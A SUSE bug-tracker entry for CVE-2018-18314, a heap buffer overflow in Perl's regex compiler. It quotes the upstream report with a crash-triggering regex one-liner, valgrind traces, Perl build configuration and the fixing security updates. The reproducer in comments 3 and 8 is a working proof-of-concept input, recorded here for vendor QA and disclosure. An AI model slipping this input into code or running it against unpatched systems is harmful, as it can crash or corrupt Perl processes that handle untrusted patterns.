Bug 1114686 (CVE-2018-18314)

Summary: VUL-1: CVE-2018-18314: perl: Heap-based buffer overflow in regex
Product: [Novell Products] SUSE Security Incidents Reporter: Marcus Meissner <meissner>
Component: IncidentsAssignee: Michael Schröder <mls>
Status: RESOLVED FIXED QA Contact: Security Team bot <security-team>
Severity: Minor    
Priority: P4 - Low CC: smash_bz
Version: unspecified   
Target Milestone: ---   
Hardware: Other   
OS: Other   
URL: https://smash.suse.de/issue/218667/
Whiteboard: CVSSv3:SUSE:CVE-2018-18314:4.5:(AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L) CVSSv3:RedHat:CVE-2018-18314:7.0:(AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H) CVSSv2:NVD:CVE-2018-18314:7.5:(AV:N/AC:L/Au:N/C:P/I:P/A:P) CVSSv3:NVD:CVE-2018-18314:9.8:(AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Found By: Security Response Team Services Priority:
Business Priority: Blocker: ---
Marketing QA Status: --- IT Deployment: ---

Comment 3 Marcus Meissner 2018-11-05 12:43:13 UTC 
QA REPRODUCER:

valgrind perl -e 'm/(?[(?s:(?[[x]][xx]xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx])/;'
Comment 4 Marcus Meissner 2018-11-05 13:29:42 UTC 
CRD: 2018-11-22
Comment 5 Marcus Meissner 2018-11-09 07:10:17 UTC 
CRD: 2018-11-29
Comment 6 Michael Schröder 2018-11-21 15:14:03 UTC 
I don't think perl-5.18 is affected.
Comment 8 Marcus Meissner 2018-11-30 09:52:49 UTC 
https://rt.perl.org/Public/Bug/Display.html?id=131649

Bug #131649 for perl5: [CVE-2018-18314] Heap-based buffer overflow in S_regatom

Jakub Wilk <jwilk@jwilk.net> - Anfrage erstellt
From: 	Jakub Wilk <jwilk [...] jwilk.net>
Date: 	Sun, 25 Jun 2017 00:25:07 +0200
An: 	perl5-security-report [...] perl.org
Betreff: 	Heap-based buffer overflow in S_regatom
Herunterladen (unbenannt) / mit Kopfzeilen
text/plain 4.6k
Consider the following Perl program:

m/(?[(?s:(?[[x]][xx]xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx])/;
__END__

This is what happens when I run it:

  The regex_sets feature is experimental in regex; marked by <-- HERE in m/(?[ <-- HERE (?s:(?[[x]][xx]xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx])/ at test line 1.
  The regex_sets feature is experimental in regex; marked by <-- HERE in m/(?[(?s:(?[ <-- HERE [x]][xx]xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx])/ at test line 1.
  panic: reg_node overrun trying to emit 0, 8677794>=8677790 at test line 1.

Valgrind says it's a heap-based buffer overflow:

  Invalid write of size 1
     at 0x80EE11B: S_regatom (regcomp.c:13490)
     by 0x80E6A9D: S_regpiece (regcomp.c:11669)
     by 0x80E6872: S_regbranch (regcomp.c:11594)
     by 0x80E58D4: S_reg (regcomp.c:11332)
     by 0x80D85AF: Perl_re_op_compile (regcomp.c:7309)
     by 0x806D7DF: Perl_pmruntime (op.c:5882)
     by 0x80C2417: Perl_yyparse (perly.y:1204)
     by 0x8086637: S_parse_body (perl.c:2377)
     by 0x808578B: perl_parse (perl.c:1692)
     by 0x8061751: main (perlmain.c:121)
   Address 0x428e698 is 0 bytes after a block of size 160 alloc'd
     at 0x402A1CC: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
     by 0x81082BC: Perl_safesysmalloc (util.c:153)
     by 0x80D7E43: Perl_re_op_compile (regcomp.c:7155)
     by 0x806D7DF: Perl_pmruntime (op.c:5882)
     by 0x80C2417: Perl_yyparse (perly.y:1204)
     by 0x8086637: S_parse_body (perl.c:2377)
     by 0x808578B: perl_parse (perl.c:1692)
     by 0x8061751: main (perlmain.c:121)

$ perl -V
Summary of my perl5 (revision 5 version 26 subversion 0) configuration:
  Commit id: 95388f2eb27e74cdbfb715c0097f16aeba4e6e4e
  Platform:
    osname=linux
    osvers=3.16.0-4-686-pae
    archname=i686-linux
    uname='linux dirac 3.16.0-4-686-pae #1 smp debian 3.16.43-2 (2017-04-30) i686 gnulinux '
    config_args='-Dcc=gcc -d'
    hint=previous
    useposix=true
    d_sigaction=define
    useithreads=undef
    usemultiplicity=undef
    use64bitint=undef
    use64bitall=undef
    uselongdouble=undef
    usemymalloc=n
    default_inc_excludes_dot=define
    bincompat5005=undef
  Compiler:
    cc='gcc'
    ccflags ='-fwrapv -fno-strict-aliasing -pipe -fstack-protector-strong -I/usr/local/include -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 -D_FORTIFY_SOURCE=2'
    optimize='-g'
    cppflags='-fwrapv -fno-strict-aliasing -pipe -fstack-protector-strong -I/usr/local/include'
    ccversion=''
    gccversion='4.9.2'
    gccosandvers=''
    intsize=4
    longsize=4
    ptrsize=4
    doublesize=8
    byteorder=1234
    doublekind=3
    d_longlong=define
    longlongsize=8
    d_longdbl=define
    longdblsize=12
    longdblkind=3
    ivtype='long'
    ivsize=4
    nvtype='double'
    nvsize=8
    Off_t='off_t'
    lseeksize=8
    alignbytes=4
    prototype=define
  Linker and Libraries:
    ld='cc'
    ldflags =' -fstack-protector-strong -L/usr/local/lib'
    libpth=/usr/local/lib /usr/lib/gcc/i586-linux-gnu/4.9/include-fixed /usr/include/i386-linux-gnu /usr/lib /lib/i386-linux-gnu /lib/../lib /usr/lib/i386-linux-gnu /usr/lib/../lib /lib /usr/local/lib /usr/lib/gcc/i586-linux-gnu/4.9/include-fixed /usr/include/i386-linux-gnu /usr/lib /usr/local/lib /usr/lib/gcc/i586-linux-gnu/4.9/include-fixed /usr/include/i386-linux-gnu /usr/lib /usr/local/lib /usr/lib/gcc/i586-linux-gnu/4.9/include-fixed /usr/include/i386-linux-gnu /usr/lib /usr/local/lib /usr/lib/gcc/i586-linux-gnu/4.9/include-fixed /usr/include/i386-linux-gnu /usr/lib
    libs=-lpthread -lnsl -ldl -lm -lcrypt -lutil -lc
    perllibs=-lpthread -lnsl -ldl -lm -lcrypt -lutil -lc
    libc=libc-2.19.so
    so=so
    useshrplib=false
    libperl=libperl.a
    gnulibc_version='2.19'
  Dynamic Linking:
    dlsrc=dl_dlopen.xs
    dlext=so
    d_dlsymun=undef
    ccdlflags='-Wl,-E'
    cccdlflags='-fPIC'
    lddlflags='-shared -O2 -L/usr/local/lib -fstack-protector-strong'


Characteristics of this binary (from libperl):
  Compile-time options:
    HAS_TIMES
    PERLIO_LAYERS
    PERL_COPY_ON_WRITE
    PERL_DONT_CREATE_GVSV
    PERL_HASH_FUNC_ONE_AT_A_TIME_HARD
    PERL_MALLOC_WRAP
    PERL_OP_PARENT
    PERL_PRESERVE_IVUV
    USE_LARGE_FILES
    USE_LOCALE
    USE_LOCALE_COLLATE
    USE_LOCALE_CTYPE
    USE_LOCALE_NUMERIC
    USE_LOCALE_TIME
    USE_PERLIO
    USE_PERL_ATOF
  Built under linux
  Compiled at Jun 21 2017 19:00:20
  @INC:
    /usr/local/lib/perl5/site_perl/5.26.0/i686-linux
    /usr/local/lib/perl5/site_perl/5.26.0
    /usr/local/lib/perl5/5.26.0/i686-linux
    /usr/local/lib/perl5/5.26.0

-- 
Jakub Wilk
Comment 9 Swamp Workflow Management 2018-12-19 14:15:33 UTC 
SUSE-SU-2018:4187-1: An update that fixes four vulnerabilities is now available.

Category: security (moderate)
Bug References: 1114674,1114675,1114681,1114686
CVE References: CVE-2018-18311,CVE-2018-18312,CVE-2018-18313,CVE-2018-18314
Sources used:
SUSE Linux Enterprise Module for Development Tools 15 (src):    perl-5.26.1-7.6.1
SUSE Linux Enterprise Module for Basesystem 15 (src):    perl-5.26.1-7.6.1
Comment 10 Swamp Workflow Management 2018-12-22 23:12:08 UTC 
openSUSE-SU-2018:4258-1: An update that fixes four vulnerabilities is now available.

Category: security (moderate)
Bug References: 1114674,1114675,1114681,1114686
CVE References: CVE-2018-18311,CVE-2018-18312,CVE-2018-18313,CVE-2018-18314
Sources used:
openSUSE Leap 15.0 (src):    perl-5.26.1-lp150.6.6.1
Comment 11 Marcus Meissner 2023-03-22 13:07:31 UTC 
done